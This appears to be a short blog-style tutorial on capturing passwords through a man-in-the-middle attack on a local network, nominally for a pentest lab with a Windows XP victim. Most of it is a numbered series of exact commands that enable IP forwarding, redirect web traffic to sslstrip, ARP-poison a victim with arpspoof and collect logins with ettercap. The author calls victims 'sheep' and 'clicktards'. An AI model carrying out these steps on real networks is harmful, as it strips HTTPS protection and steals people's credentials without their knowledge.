Intro

Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf would then have access to their paypal account. The newer warnings are a little more scary but from what I’ve seen aren’t much of a deterrent to the clicktards out there it will be rare that they know they’re being sniffed. When doing a pentest we want passwords of the network administrators not of the lowly sheep. Most network admins are at least a little security aware
Problem: Newer versions of popular webbrowsers have better warnings for SSL Certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most “clicktards” will ignore these warnings anyway and relinquish their logons to you but we want Network Admin passwords in our pentest.

Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP not HTTPS so no warning and only the most astute and paranoid users will notice this.

My lab is as follows. BackTrack 4 live and a windows XP machine which will be my victim.

Here is what I did step by step in BT4 Live boot to get this to work.

1. Start networking on BT4

 /etc/init.d/networking start

2. Enable ipv4 forewarding

 echo “1″ > /proc/sys/net/ipv4/ip_forward

3. Create an iptables rule to foreward traffic destined for port 80 to the port used by sslstrip which is 10000 by default
 
 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

4. Now we need to start arpspoof to poision the victims arptable
 
 arpspoof -i eth0 -t <Victims IP Address> <The Gateways IP Address>

5. now we start sslstrip with the -a switch
 
 sslstrip -a

6. next we need to start ettercap
 
 ettercap -T -q -i eth0

7. wait for someone to logon and grab their password!!